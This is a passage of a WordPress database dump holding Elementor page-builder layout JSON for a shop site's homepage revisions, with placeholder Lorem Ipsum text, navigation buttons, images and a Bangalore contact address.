here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8152,1440,'_elementor_page_assets','a:0:{}'),(8154,1441,'_elementor_edit_mode','builder'),(8155,1441,'_elementor_template_type','wp-page'),(8156,1441,'_elementor_version','3.7.7'),(8157,1441,'_wp_page_template','elementor_canvas'),(8158,1441,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8159,1441,'_elementor_page_assets','a:0:{}'),(8161,1442,'_elementor_edit_mode','builder'),(8162,1442,'_elementor_template_type','wp-page'),(8163,1442,'_elementor_version','3.7.7'),(8164,1442,'_wp_page_template','elementor_canvas'),(8165,1442,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 